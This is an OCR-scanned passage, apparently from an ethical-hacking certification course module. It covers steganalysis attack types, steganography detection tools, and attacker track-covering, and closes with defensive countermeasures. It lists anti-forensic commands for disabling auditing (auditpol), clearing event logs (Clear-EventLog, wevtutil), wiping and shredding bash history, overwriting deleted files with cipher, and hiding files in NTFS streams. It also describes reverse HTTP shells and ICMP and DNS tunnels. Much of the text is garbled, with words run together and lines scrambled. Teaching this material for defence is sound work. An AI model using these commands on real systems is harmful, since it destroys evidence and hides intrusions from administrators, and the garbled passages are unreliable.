the classification includes the followingtypesof attacks:stego-only, known:
stego,known-message, known-cover,chosen-message, chosen-stego,chi-square, distinguishing
statistical,
andblindclassifier.
=
Stego-only
attack
Ina stego-only attack,the steganalyst
or attackerdoes not have access to any
informationexceptthe stego-mediumor stego-object. the steganalyst
In this attack,
must try every possiblesteganography
algorithmand relatedattack to recover the
hiddeninformation.
attack
Known-stego
Thisattackallowsthe attackerto knowthe steganography
algorithm
as well as the
original
and stego-object.
The attackercan extract the hiddeninformationwith the
information
at hand.
Known-message attack
The known-message and the stego-medium
attack presumesthat the message are
available. thisattack,
Using one can
detect
the technique
usedto hidethe message.
ical andCountermensores
Mackin ©by E-Comel
Copyright
attack
Known-cover
Attackersuse the known-coverattackwhentheyknowboth the stego-object
andthe
original will
cover medium.This
in ofthe
changesthe format
enablea comparison betweenbothmediums detect
mediumandfindthe hiddenmessage. to
Chosen-message attack
The steganalyst uses a known message to generate a stego-object
byusingvarious
steganography toolsto findthe steganographyalgorithmusedto hidethe information.
Thegoal i n the stego-object
in thisattackis to determinepatterns that may pointto the
useof specific
steganography
toolsor algorithms.
Chosen-stego
attack
Thechosen-stego
attacktakesplacewhenthe steganalyst
knowsboth the stego-object
tool or algorithm
andsteganography usedto hidethe message.
Chi-square
attack
Thechi-squaremethodis basedon probability analysis to test whethera given stego-
object
and the originaldata are the same or not. If the difference betweenboth is
nearlyzero, then no data are embedded; otherwise,the stego-object includes
‘embedded
datainside.
Distinguishing
statistical
attack
In the distinguishing
statisticalmethod,the steganalyst or attacker analyzes
the
embeddedalgorithm usedto detect distinguishing
statisticalchanges,
alongwith the
lengthof the embeddeddata
Blindclassifierattack
In the blind classifiermethod,a blind detectoris fed with the original
or unmodified
stego-object andoriginal
of
datato learntheappearancethe original
data.
datafrommultiple Theoutput
perspectives.
of the blind detectoris usedto train the classifierto detectdifferencesbetweenthe
ical andCountermensores
Mackin ©by E-Comel
Copyright
Detecting
Steganography
(Text,
image, Audio,and Video Files)
1G T he
canbe
detected
by ange
in
h den dts inanimage determining ia, format he
"©Te
statistical
(©T he
atic
image
be
anatamethodi sed for
aris eth an eed
scanning
{a
Theinaude
can
be
scanned
for
iden
frequencies information
Detecting (Text,
Steganography Audio,andVideoFiles)
Image,
Steganography is the art of hidingeither confidentialor sensitive informationwithin a cover
medium.In this method, the unusedbitsof datai n computer filessuchas graphics,digital
images,text, and HTML, helpi n hidingsensitive information from unauthorizedusers.
Detectionof thehidden
datainvolves approaches
different depending
on the file typeused.
Thefollowing
filetypesrequirespecific
methodsto detecthidden
messages.
Text File
Fortext files,alterationsare madeto the characterpositionsto hidethe data.Onecan
detectthesealterationsbylooking thelanguage
fortext patternsor disturbances, used,
line height, or an unusualnumberof blank spaces.A simple word processor can
sometimes revealtext steganography as it displays the spaces,tabs,and other
characters thatdistortthetext’s
presentationduringtext steganography.
Textsteganography
can bedetectedbytaking
a closerlook at the following
aspects:
i n the stego-object
Unusual patterns
© Appended andinvisible
extra spaces characters
File
Image
Theinformationhiddeni n an imagecan bedetectedbydetermining
changes i n size,file
format,
Thefollowing
lastmodified
lastmodified, timestamp,andcolorpalette
the file.
imagesteganography:
pointscan helpyou in detecting
of
Severaldisplay
distortionsin images
©
Sometimes
become
grossly
images may degraded
ical andCountermensores
Mackin ©by E-Comel
Copyright
Detectionof anomaliesthrough
evaluatingtoo manyoriginal imagesand stego-
luminance,
imagesconcerning colorcomposition, pixelrelationships,
etc.
>
Exaggerated “noise―
Statisticalanalysis
methodshelpto imagefor steganography.
scan an Whenever you
insert a secret messageinto an n o longer
image, LSBs
a re random.Withencrypted data
that hashighentropy,the LSBof the cover will not contain information
about the
original
and is more or lessrandom.Byusing statisticalanalysis
on the LSB,
you can
identify
thedifferencebetweenrandom valuesandrealvalues.
AudioFile
Audiosteganography is a processof embedding confidentialinformationsuchas private
documentsandfiles i n digitalsound.Statisticalanalysis
methodscan be usedto detect
audiosteganography Theinaudiblefrequencies
as it involvesLSBmodifications. can be
scannedfor hiddeninformation.Theodddistortionsand patterns showthe existence of
secret
data,
VideoFile
Detection of secret data i n videofiles includesa combinationof the methodsusedi n
imageandaudiofiles.Special codesignsandgestures helpi n detecting
secret data,
Bothaudioandvideosteganographyare quitedifficult
to detect,compared to othertypessuch
as imageanddocument. Moreover, hardto detectgood
it is extremely steganographyof any
type.However,carefulanalysis
of audioandvideosignals for hiddeninformationmayincrease
chances it correctly.
of detecting
ical andCountermensores
Mackin ©by E-Comel
Copyright
DetectionTools
Steganography
DetectionTools
Steganography
Steganography
detectiontools allow you to detectand recover hiddeninformation
digital
=
media,
asteg
audio,
images,
video.
such
as and
Source:https://github.com
Thezstegtool is usedto detectstegano-hidden
datai n PNGandBMPimage files.
shownin the
‘As screenshot,
you can use the zstegtool to detectthe hiddensecret
message
inthe
image
file.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Parrot Terminal
Search Terminal Help
6.148Screenshot
Figure of ste
Someexamples
of steganography
detectiontoolsare as follows:
StegoVeritas(https://github.com)
+
stegextract(https://github.com)
‘=
(https://www.wetstonetech.com)
StegoHuntâ„¢
Studio(htto://stegstudio,sourceforge.net)
‘Steganography
Virtual Steganographic
Laboratory (http://vsl.sourceforge.net)
(VSL)
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
1 System
HackingConcepts Escalating
Privileges
Gaining
Recess Maintaining
Accoss
2 @-- e
Clearing
Logs
In the previoussection,w e saw howan attacker can hidemaliciousfileson a targetcomputer
using various steganographic techniques, NTFSstreams, and other techniques to maintain
futureaccess to the target.Oncethe attackerhassucceeded i n performing this malicious
operation, the next stepinvolvesremoving any resultanttraces/tracks
i n the system.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Tracks
Covering
(Onceintruders havesucessfully
fsined administrator acess ona
system, theywl try t0 cover thle
tracksf e avoiddetection ett comms
@ veering
on
@cows nents
Tracks
Covering
Covering during
tracksis one of the main stages systemhacking.In this stage,theattackertries
hideand avoidbeing
to detectedor “traced bycoveringall “tracks,―
out― or logs,generated
while accessing
the targetnetworkor computer.
We now look at howthe attackerremoves
traces of an attackon
targetcomputer.
a
evidence
Erasing i s a must for any attacker
who wouldlike to remain obscure.It is amethod
usedto evadea traceback.It starts with erasing the contaminatedlogsand possible error
messages generatedi n the attack process.The attacker makeschanges to the system
configuration suchthat it doesnot logthe futureactivities. Bymanipulating
andtweaking event
logs,the attackertricksthe systemadministrator into believingthat thereis no malicious
activityi n the system
andthat no intrusion or compromise hastakenplace.
Becausethe first thing a syste administrator
doeswhenmonitoring unusualactivityis check
the system to usea tool to modify
logfiles,itis common forintruders theselogs.
In some cases,
rootkitscan disableanddiscardall existinglogs.Attackersremove onlythoseportions of logs
that can revealtheirpresenceif theyintendto use the systemfor a longperiod as a launch
basefor future exploitations.
Attackersmust makethe system appear as it did beforeaccess was gainedanda backdoorwas.
established.Thisallowsthemto change any file attributesbackto theiroriginal state. The
informationlisted,
suchas file size anddate, is justattributeinformation
containedi n thefile.
Protection attackerstryingto cover their tracksbychanging
against file informationcan be
difficult. However,
it is possible
to detectwhetheran attackerhasdoneso bycalculating the
file'scryptographic
of
hash.Thistypeof hashis a calculation the entire file beforeencryption.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackers
maynot wishto delete an entire logto cover their tracks,
as doing s o mayrequire
adminprivileges.
detection, only
If attackerscan delete attackevent logs, theywill stil be ableto escape
attacker
The
=
thelogins,
can manipulatelogfileswiththe help
accessing
(security):
SECEVENT.EVT failed
of
fileswithout privileges
‘=
things
(system):
SYSEVENT.EVT driverfailure, not correctly
operating
APPEVENT.EVT
‘*
Techniques
(applications)
UsedforCovering
Tracks
towardremovinghis/her
Themain activities that an attackerperforms traces on a computer
are as follows:
*
Disabling
Auditing: An attacker
disables features
auditing ofthetargetsystem.
Clearing Logs: An attackerclears/deletes
the systemlogentries corresponding to
his/her
activities
Manipulating manipulates
An attacker
Logs: logsi n sucha way that he/she
will not be
caughtin legal
action.
Covering on the Network: An attackeruses techniques
Tracks suchas reverse HTTP
shells,
reverse ICMPtunnels,
network
ONS andTCPparameters
tunneling, to cover tracks the
on
Covering Trackson the OS:An attackeruses NTFSstreamsto hideandcover malicious
filesinthe targetsystem,
Deleting
Files:An attackeruses a tool suchas Cipher.exe
command-line to deletethe
Disabling Windows
of
dataandpreventrecovery that datai n future.
Functionality:
An attackerdisables Windows functionalitysuchas
lastaccess timestamp, hibernation,virtual memory, system
restore points,
etc. to cover
tracks.
Thus,the complete jobof an attackerinvolvesnot onlycompromising the systemsuccessfully,
but alsodisabling
logging, logfiles,eliminating
clearing planting
evidence, additionaltools,
and
coveringhis/her
tracks.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Disabling
Auditing:
Auditpol
ate gaining
immediately
Disabling
Auditing:
Auditpol
Source:https://docs.microsoft.com
One of the first stepsfor an attackerwho hascommand-line capability
is to determinethe
auditingstatus of the targetsystem,locatesensitive files(suchas password files),
andimplant
automatic information-gatheringtools(suchas a keystroke logger
or networksniffer).
his/her
plans.
Auditpol.exe utilitytool to change
is the command-line audit security
settingsat the category
andsub-category levels.Attackerscan use AuditPolto enable or disable auditing
security on
localor remote systems, and to adjustthe audit criteria for different categories
of security
events.
Themoment intruders privileges;
gain administrative theydisableauditing
with the helpof
auditpol.exe.
Oncetheycomplete
their mission, theyagain turn on auditing
using the same
tool.
Aftergainingaccess and establishing
shellaccess with the targetsystem,
attackersuse the
following
commands to enable/disable
system auditinglogs:
Enabling auditing:
system
C:\>auditpol/set /category:"system―,―account
logon―/success:enable
/failure:enable
ical andCountermensores
Mackin ©by E-Comel
Copyright
Disabling auditing
system
logon―/success:disable
€:\zauditpol/set /category:―system―,―account
/failure: disable
Thiswill makechangesi n the various logs
chooseto hidethe registry keyschanged
that might
lateron. the
registerattacker'sactions.He/she
can
of
Screenshots the outputbyAuditpol are as follows:
showing
the
output
Screenshot
Figure 6.149: ofAull sablingaut
showing
6.150Sereenshot
Figure theoutputof Audtpol audit
enabling
ical andCountermensores
Mackin ©by E-Comel
Copyright
Clearing
Logs CEH
Clearing
Logs(Cont'd)
alllogs
T oclear
thesystems
on species and then
Clearing
Logs
Clear_Event_Viewer_Logs.bat is a utilitythat can be usedto wipe out the logs of the target
system. Thisutility
c an be run through commandprompt,Powershell, and usinga BATfile to
deletesecurity,
system, and application logs.Attackers mightu se this utilityto wipe out the
logsas one methodof covering theirtrackson the targetsystem,
ical andCountermensores
Mackin ©by E-Comel
Copyright
to clearlogs
Steps usingClear_Event_Viewer_Logs.bat
utilityare as follows.
1. Downloadthe Clear_Event_Viewer_Logs.bat
utilityfrom
https://www.tenforums.com.
Unblock
the
.bat
file
or pressandholdon the .batfile andclick/tap
Right-click on Runas administrator.
byUAC,click/tap
If prompted on Yes.
commandpromptwill now open to clearthe event logs.
‘A Thecommandprompt
will
automatically
closewhenfinished,
Steps
Figure
6.151:
of logs
to clearlogs
using
Clear
Logs
bat
Screenshot
clearing
using
Meterpreter
the EventViewer
shellare as follows.
fle
If the systemexploited
is
out all the logs shell
with Metasploit,
froma Windowssystem:
the attacker uses a Meterpreterto wipe
ical andCountermensores
Mackin ©by E-Comel
Copyright
6.152:
Figure Screenshot
ofMeteroreter
Steps logsusing
to clearPowerShell commanda re as follows.
Clear-EventLog
Source:https://docs.microsoft.com
Using
logs
the Clear-EventLog command,
fromlocalor remote computers:
the attackercan
clear
all the PowerShell
event
1. LaunchWindowsPowerShellwithadministratorprivileges,
2. Use the following commandto clearthe entries fromthe PowerShell
event logon
the localor remote system:
>Clear-EventLog
“Windows
PowerShell"
Use
the
following
systems:
to clearspecific
command multiple
log
types
fromlocalor remote
ical andCountermensores
Mackin ©by E-Comel
Copyright
usedin theCLear-BventZogcommand
Note:Theparameters are as follows:
~ComputexNane:Specifies
a remote computer;thedefaultis thelocalcomputer
»
you for confirmation
~Confizm: Prompts beforerunningemdlet
~LogNane: Specifies
the event logs
whatwill happen
-WhatT£:Shows if theemdletr uns
‘=
Steps using
to clearevent logs wevtutil utilityare as follows.
1. Launchcommand withadministrator
prompt privileges.
2. Usethefollowing
commandto display
a list ofevent logs:
>wevtutil el
3. Usethe
following
>wevtutil
command
cl
clear
event
logs:
<log_nane>
to the
Figureelearng
logs
sing
wevtuti of
6.153-Sereenshot the tity
ical andCountermensores
Mackin ©by E-Comel
Copyright
Manually Event Logs
Clearing
ical
Mackin
and ©by
CountermensoresCopyright
E-Comel
ForWindows
‘=
Navigateto Start > ControlPanel> System > AdministrativeTools>
and Security
double-clickEvent Viewer
=
Deletetheallthe logentries logged thesystem
whilecompromising
Ceol
Gh Gvviewer
To
ThEse viewerdeco)
Clearing
Figure6154: forWindows
event logs
ical andCountermensores
Mackin ©by E-Comel
Copyright
ForLinux
=
to the/var/log
Navigate directory
on theLinuxsystem
=
Open
the plaintext logmessageswith text editor/var/log/messages
file containing
+
Delete
all entries
thelog loggedwhile compromising
the system
|
Open ~
fim
3'03:11:18 kali kernel: { 0.000000}Connand Line: BO0T_IHAGE=/boot
inuz=4.19,0-kali3-and64 root=/dey tall/gtk/initrd.gz quiet
Pay 23-02:11;18 kali kernel: [ string operations
hay 2 3 03:11:18 kali kernel [porting XSAVEfeature exoo1
x87 floating point registers’
May2 3 03:11:18 kali kernel c
[porting XSAVEfeature 0002:
SSE registers:
3 723 03:11:18 kali Kernel porting XSAVEfeature 0x004:
ay 2 3 03:11:18 kali kernel: ( tate offset{2l: 576,
All
xstate sizes(2]: 256
Select
May2 3 03:11:18 kali kernel: [ labledxstate features 0x7
Context size is 832 bytes, using Pot
May2 3 03:11:18 kali kernel: [ l e d physical Rammap:
Hay23 03:11:18 kali kernel: [02 Change »
linen
'x0000000000000000-0x000000000009ebir1usaDie
May 2 3 03:11:18 kali kernel: [0.000000] B10S-e820: [nen
1x000000000009ec00-Oxs000000000091FFT] reserved
Figure
6.55: Clearing
eventlogs
for Linux
Module
6 811
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
to Clear Online Tracks
Ways
©Remove
‘and
theMostRecently
cleatheToolbar
Used(MRU),deletecookies,
datafrm thebrowsers
clear
the turnoff Autocomplete,
cache,
1 In
Explorer
remove
clickStarfromtheleft
Personalization,
Micosof\Windows\Currentversion\
andthen the key
i oo
to ClearOnline Tracks
Ways
Attackerscan clearonlinetracksmaintainedusing web history,
logs,
cookies,
cache,
downloads,
visited
time, etc. on thetargetcomputer
theattackershaveperformed, so
that
the
victims
cannot
what
notice onlineactivities
‘What
can attackersdo to cleartheir onlinetracks?
Use privatebrowsing *
Cleardatai n the password
manager
*
address user
Delete history
Disable
in the field
storedhistory
*
=
Deletesavedsessions
Delete JavaScript
Deleteprivatedata Setup multiple
users
cookies
Clear
Clearcacheo n
on exit
exit
Remove Most Recently
Used(MU)
Cleartoolbardatafrom browsers
Delete
=
Turn
off
AutoComplete
Disablepassword
downloads
manager
attackersshouldfollow different pathsfor
To clearthe online tracksof various activities,
different
OSs.
The stepsto clearonline tracksfromthe Privacy or fromthe Windows
Settings registry
(Windows10)are as follows:
‘=
Fromthe Privacy
Settings
in Windows
10
©. Right-click
on theStartbutton, andclickon Personalization
chooseSettings,
ical andCountermensores
Mackin ©by E-Comel
Copyright
clickStartfromthe left paneandturn offboth“Show
In Personalization, most used
apps―
and"Showrecently
opened
items in Jump
Listson Startor the taskbar―
+
From the Registry
in Windows10
© theRegistry
Open Editorandnavigate
to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentV
andthenremove thekey for "RecentDocs―
Deleteall thevaluesexcept“(Default)―
ical andCountermensores
Mackin ©by E-Comel
Copyright
BASHShellTracks
Covering
BASH
isan
(@T h e
1 can
You
theshell
hat ina
saved
History
ew called
s-compatible
command command
sores
ung
command
he
fe
history
Bash
istry
more“/.bash_Nstory
boner - (nah
ted
sor
BASHShellTracks
Covering
BourneAgainShell,
or Bash,is an sh-compatible
shellthat stores commandhistory
i n a file
calledthe bashhistory.
You can view the saved commandhistoryusing the more
~/.bash_historycommand
featureof Bashis a problem
‘This for hackers, coulduse the bash_history
as investigators file to
trackthe origin of an attackandthe exact commands usedbyan intruderto compromise a
system.
usethe following
Attackers commands
to clearthesaved history
command tracks:
=
Disabling
history
export HISTSIZ
Thiscommanddisables the Bashshell fromsavinghistory. HISTSIZEdetermines
the
numberof commands to be saved, this command,
which is set to 0. After executing
attackerslosetheirprivilege
to review thepreviously usedcommands.
Clearing
the history
© history ~
ical andCountermensores
Mackin ©by E-Comel
Copyright
Clearing complete
theuser’s history
cat /dev/null >history && history -c 66 exit
~.bash
Thiscommanddeletesthe complete
andexitsthe shell.
command
of
historythe current andallothershells
Shredding thehistory
shred ~/.bash_history
This command shredsthe history file and rendersits contents unreadable.
It is
usefulwhenan investigatorlocatesthe file,but owing to this command,
becomes
shred
to file. .bash
tunable readanycontent in thehistory
~/.bash_historyés history
cat /dev/null > &&
history -¢ 66 exit
parrot
texport HISTSIZE=0
bournF E400
ab
468-206
Figure
6.15: Covering
Bashselltacks
ical andCountermensores
Mackin ©by E-Comel
Copyright
Trackson a Network
Covering
consiered
normal
oranzton's
network
perimeter
behaves a webserver
Thstipe trate
andresponds
a
tothe requests.
tac acuity
Using
Reverse
ICMP
‘Tannels
‘Tne
TCP
vii’ syste to capt
triggered the payoudin anCMP
echo phe hats
TEMP
packets,
can
ealthe therefore
tale bypass rewall
Covering
Tracks on a Network (Cont'd)
Bans
| ons
Using
creates
D NS
DNS
canbck efitrate
use stolen
tuneing
(2 stacker make ofthisback
information
framthe server
channel
to aces2
channelto
remoteserver andappatons
confidentialor sensi
|
SattaaeComments EE)
Covering
Tracks on a Network
=
Using HTTPShells
Reverse
attackerstarts this attackbyfirst infecting
‘An a victim'smachinewith malicious code,
andthereby installing a reverse HTTPshellon the victim’s
system. Thisreverse HTTP
shell is programmed in such@way that it asksfor commands to an externalmaster,
which controlsthe reverse HTTP shell on a regular basis.This type of traffic is
ical andCountermensores
Mackin ©by E-Comel
Copyright
normalbyan organization's
considered networkperimeter controlslikeDMZ,
security
firewall,
etc.
Once a n attackertypessomethingon the master system,the commandis retrievedand
executedon thevictim’s
system.Thevictim hereacts as a webclientwho executesthe
HTTPGETcommands,
the requests.
next web request.
whereasthe attackerbehaveslike a web server and responds
Oncethe previouscommands are executed, the resultsare sent in the to
can normally
All theotherusers i n the network accessthe Internet; thetraffic
therefore,
betweentheattackerandthe victim is seenas normal,
Using Reverse ICMPTunnels,
Internet ControlMessage Protocol(ICMP) tunneling is a techniquei n whichan attacker
uses ICMPechoand reply packets as carriers of TCPpayload, to stealthilyaccessor
controla system.Thismethodcan be usedto easily bypass firewallrules,becausemost
organizations
‘outgoing
ones.
have
security
mechanisms that onlycheckincomingICMPpackets but not
attackerfirstconfigures
‘An the localclient to connect with the victim.Thevictim's
systemis triggeredto encapsulate a TCPpayload in an ICMPecho packet, whichis
forwardedto the proxyserver. The proxyserver de-encapsulates and extracts the TCP
payload,
Using
andthen
DNSTunneling.
sends
it to the attacker.
Using
TCPParameters
TCP parameters can be used bythe attackerto distributethe payload
and to create
covert channels.
Someof theTCPfieldswheredatacan behiddenare as follows:
© IP IdentificationField:Thisis an easy approach
i n whicha payload
is transferred
bitwiseover an established
session between In this approach,
two systems. one
characteri s encapsulated
perpacket.
ical andCountermensores
Mackin ©by E-Comel
Copyright
TCPAcknowledgement Number:Thisapproach is quitedifficulta s it usesa bounce
server that receives packetsfromthe victim andsendsit to an attacker.Here, one
hiddencharacter is relayed
bythebounceserver per packet
TCPInitial Sequence Number:Thismethodalsodoes not require an established
connection betweenthe two systems. Here,one hiddencharacteris encapsulated
perSYNrequestandreset packet,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Covering
Tracks on an OS CEH
‘Windows NK
Tracks on an OS
Covering
=
Windows
NTFShasa featurecalledADSthat allowsattackersto hidea file behindother normal
tofiles
files.Steps hide a re as follows:
usingNTFS
©
©
Open promptwith an elevatedprivilege
the command
Typethecommand“type
C:\SecretFile. txt
(here, C
>C: \LegitFile. txt
wherethe SecretFile.txt
:SecretFile. txt― thefileis kept the drive
file is hiddeninsidethe Legitfile.txt
file)
To view
the
hidden txt"
file,type“more
knowthehiddenfile name)
< C:\SecretFile. (forthis you needto
Hidden
Content
6157: Covering
Figure tracks
on Windows
0S
ical andCountermensores
Mackin ©by E-Comel
Copyright
UNIX
Filesin UNIXcan be hiddenjust byappendinga dot (.)in front of a file name. In UNIX,
each directoryis subdividedinto two directories:current directory (,) and parent
files a/tmp,
directory(..).
hiddenusually
/dev,
are
and a .
Attackersgive these similarname like
placed
in /etc.
(with spaceafter ).These
“, "
‘An log
attacker
can alsoeditthe filesto cover theirtracks.However,
sometimes,
using
this technique
of hidingfiles,a n attackercan leavehis/hertrace behindbecausethe
‘command
a
he/she
he/she
.bash_history
usedto open file will be recorded
attackerknowshow to overcome sucha problem;
command,
in a file.A smart
doesso byusingthe export
Figure6.158:
Covering
tracks
onUNKKOS
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
DeleteFilesusing Cipher.exe CEH
|@opherese
can but
Windowssecurely
delete
data
by
commande too tht can beused
to overwriting
DeleteFiles using
Cipher.exe
Cipher.exe is a n in-builtWindowscommand-line tool that can be usedto securely deletedata
byoverwriting themto avoidrecoveryi n thefuture.Thiscommand alsoassistsi n encrypting
anddecrypting datain NTFSpartitions
Whena n attackercreates and encrypts a malicioustext file,at the time of the encryption
process, a backup fileis created.Therefore, ifthe encryption processi s interrupted, thebackup
file can beusedto recover the data.After the completion of the encryption process,the backup
fileis deleted, butthisdeletedfilecan berecoveredusingdatarecoverysoftware andcan then
beusedbysecurity personnel for investigation.
To avoiddata recovery and cover their tracks, attackersuse the Cipher.exe tool to overwrite
thedeletedfiles, firstwith all zeroes (0x 00),secondwith all 255s(0x FF}, andthen finally with
randomnumbers.
attackerc an deletefilesusingCipher.exe
‘The byimplementing
the following
steps:
=
Launch command privileges
promptwith administrator
Use
following
command
the
overwrite
deleted
specific
folder:
to
cipher /w:<drive letter>:\<folder
filesin a
name>
Use
following
command
the
overwrite
alldeleted to
cipher /w:<drive letter>
the filesin the givendrive:
ical andCountermensores
Mackin ©by E-Comel
Copyright
6.159:
Figure Screenshot
ofCipher
exe command
ical andCountermensores
Mackin ©by E-Comel
Copyright
DisableWindowsFunctionality
fous
DisabletheLast
a uty in
AccossTimestamp
Disable
Windows
DisableWindows
hibernation
Hibernation
wing theRegistry
itor or c ommand
powereg
10
[windows
Modul
6 £22
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
1
DisableWindowsFunctionality
(Cont'd) CEH
DisableWindowsFunctionality
Timestamp
Disablethe LastAccess
Thelast access timestamp of a file contains informationregarding the time and data
whenthe specific filewas opened for reading or writing,Therefore,
everytime a user
accesses a file,the timestamp is updated. Attackersuse the fsutil tool to disableor
the
alast
enable access
timestamp.
utilityin theWindowsOSusedto set theNTFSvolumebehavior
foutil is command-line
parameter, DisableLastAccess, whichcontrolsthe enabling
or disabling
of the last
accesstimestamp
For example,
DisableLastAccess =
1 indicates
that the lastaccess
are
timestampsdisabled.
=
DisableLastaccess
shownin the screenshot,
‘As
0 indicates
that thelastaccesstimestamps
attackersuse the following
are enabled.
commandto disablethe last
access updates:
>fsutil behavior set disablelastaccess 1
ical andCountermensores
Mackin ©by E-Comel
Copyright
BE
Administrator Prompt
Command
6160; Screenshoto ft
Figure command
Disable
Windows
Hibernation
The hibernatefile (Hiberfil.sys)
is a hiddensystem file locatedin the root directory
wherethe OS is installed.Thisfile contains informationregarding the systemRAM
stored on a hard disk at specific
times (when the user selectsto hibernatehis/her
system).Thisinformationis crucialas security personnel can use it to investigate
an
attackon thesystem. Therefore,
disabling Windowshibernation is a crucialsteptoward
coveringthetracks.
can
Theattacker disableWindows
following
steps:
hibernation through
the the
registry byimplementing
Computer \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\P
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure 6.16:Screenshot
of Registry
Editorto disable
hibernation
©
the
implementing
following
steps:
with administratorprivileges
Launchcommandprompt
©
Use
following
command
the
powercfg.exe/hibernate
to disablehibernation:
off
Disable
Windows (Paging
VirtualMemory File)
Virtual memory,alsocalleda pagingfile,is a special file in Windowsthat is usedas a
compensation whenRAM (physical memory) fallsshortof usablespace.For example, if
an attackerhasan encrypted fileandwants to readit, he/she must firstdecrypt it. This
decrypted file staysi n the pagingfile,even after the attackerlogs out of the system.
Moreover, some third-party programscan be usedto store plaintext passwords and
other sensitive informationtemporarily. Therefore,disabling paging i n Windowsis a
step
covering
tracks.
crucial toward
Theattackerc an disablepagingbyimplementing
the following
steps:
1. Open to the following
ControlPanelandnavigate location:
System Security
and > System
> Advanced systemsettings
System
‘A dialog
Properties box appears;i n the Advanced
tab,clickon Settings.
underthe Performance
section
Options
A Performance dialog
box appears; go to the Advancedtab andclickon
Change...
the Memory
under Virtual section
ical andCountermensores
Mackin ©by E-Comel
Copyright
A VirtualMemory dialog Automatically
boxappears;uncheck managepagingfile
size for all drives
of asabiing
6.162:Screenshot
Figure throughControlPanel
paging
DisableSystem
Restore Points
Click OK
Repeat
theabovestepsfor all diskpartitions
1 Windows 10
Figure6163: of asabing
Screensht restore pointsthrough
Contral
Panel
DisableWindowsThumbnailCache
DOCK, a file
thatthumbnails
thumbs.dbis Windows
types
stores
filessuchas GIF,JPEG,
and graphic
informationregarding
PNG,
ofdocument suchas PPTXand
andTIFF.Thisthumbnailfile contains
filesthat were previously
deletedor usedon the system.
For example, if an attackerhasusedan imagefile to hide a malicious file and later
deletedit, a thumbnailof this image is storedinsidethe thumbs.dbfile,whichreveals
thatthedeletedfilewas previously usedon thesystem.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Theattackercan disablethethumbnailcachebyimplementing
the following
steps:
Windows+ Rkeys
Press to opentheRundialog
box
©
Type
gpedit.mse
andpressEnteror clickOK
The LocalGroup Editorwindowappears;navigate
Policy >
to User Configuration
Templates
‘Administrative > WindowsComponents > FileExplorer
© o n the Turnoff the caching
Double-click of thumbnailsin hiddenthumbs.dbfiles
settingfromtheright pane
© SelectEnabledto turn offthethumbnailcache
©
Click
OK
6.164:
Figure Screenshot
ofcsabling
DisableWindowsPrefetchFeature
t he thumbnalcache
Policy
in LoealGroup Ealtor
ical andCountermensores
Mackin ©by E-Comel
Copyright
For
example,
application
copy of that
usedbysecurity
has
ifan attacker installeda maliciousapplication andthenuninstalled it, a
will be storedi n the Prefetchfile. ThesePrefetchfiles can be
to recover deletedfilesduring
personnel theinvestigation
of a security
incident.
‘Attackers
© Press + Rkeys
Windows
featurebyimplementing
can disablethe Prefetch
to openthe Rundialog
box,
following
steps:
the
‘Type
services.mseandpressEnteror clickOK
Searchfor the Superfetch i t to open Superfetch
service anddouble-click Properties
(Local
Computer)
Fromthedrop-down type,selecttheDisabled
optionsi n Startup option
Click
OK
aaa
Seve caTe a
assc.
Meals groves te
4 cone
| |
ling RecoverOmndncs
aD ee
Screenshot
of disabling
theSuperetch
service
ical andCountermensores
Mackin ©by E-Comel
Copyright
Tools
Track-Covering
in
lois
ie
Tools
Track-Covering
Track-covering tools helpthe attackerto cleanup all the tracksof computerand Internet
activities on the targetcomputer.Track-covering toolsfreecachespace,deletecookies,
clear
Internethistory andsharedtemporary files,deletelogs,anddiscardjunk.
CCleaner
Source:https://www.ccleaner.com
CCleaner is @systemoptimization,privacy,andcleaning tool. It allowsattackersto
remove unusedfilesandcleanstraces of Internet browsing
detailsfromthe targetPC.
Withthistool,a n attacker tracks.
erase his/her
can veryeasily
ical andCountermensores
Mackin ©by E-Comel
Copyright
tat
© oman.
90
a)
Figure6.16;
Srensho ofCleaner
Someexamples
of track-covering
toolsare listedas follows:
+
DBAN(https://dban.org)
+
Eraser(hteps://www.cybertronsoft.com)
Privacy
Wipe (https://privacyroot.com)
(https://www.bleachbit.org)
Bleachsit
(http://www.clearprog.de)
ClearProg
Modul
6 £22
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
Defending Tracks
againstCovering
Ato nto
I erat amen
corte
sens
onfeweappopiteandminimal
deletion
og
Seogesto “append
only―
permisons m ee o prevent
necessaryoread andwrt fee Uinauthorsed of entries
Defending
against Tracks
Covering
Thevarious countermeasuresagainst
covering tracksare listedas follows:
Activate logging
functionality
on all criticalsystems
Conduct a periodic
auditon IT systems
policy
with the security
to ensure
logging
functionality is i n accordance
Ensurenew events do not overwrite old entries i n the logfileswhenthe storage limit is
exceeded
Configureappropriateandminimalpermissions necessary to readandwrite logfiles
storedon criticalsystems
logging
Maintaina separate
so
server on the DMZ,that all thecriticalservers, suchas
the DNSserver,mailserver,webserver, etc.,forwardandstore their logso n that server
Regularly
update patch
and OSs, applications,andfirmware
Closeall unusedopen portsandservices
Encryptthelogfilesstoredon thesystem,
so thataltering
themis not possible
without
anappropriate decryptionkey
Set log
filesto “append
only― deletionof logentries
modeto preventunauthorized
Periodically
backup thelogfilesto unalterable
media
ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Summary
Module Summary
In this module, in detailthe CEHhacking
we discussed methodologyalong with the various
phases involvedin systemhacking,
suchas gaining access, escalating
privileges,
maintaining
access,andcoveringtracks. We alsodiscussedthe differenttechniques andtools attackers
employ to gain access to a targetsystem.Thismodulealso discussed various tools and
techniques attackers theirprivileges.
use to escalate It explainedvarious techniques,suchas.
the execution of maliciousapplications
(keyloggers,
spyware, rootkits,ete.),NTFSstream
manipulation, and steganalysis,
steganography, whichattackers
use to maintain remoteaccess
to a targetsystemand stealcriticalinformation.It alsoelaboratedon the various techniques
usedbyattackersto erase all evidenceof compromisefrom a target system. Furthermore,
the
various countermeasuresthat shouldbe employed systemhacking
to prevent attempts,along
tools,
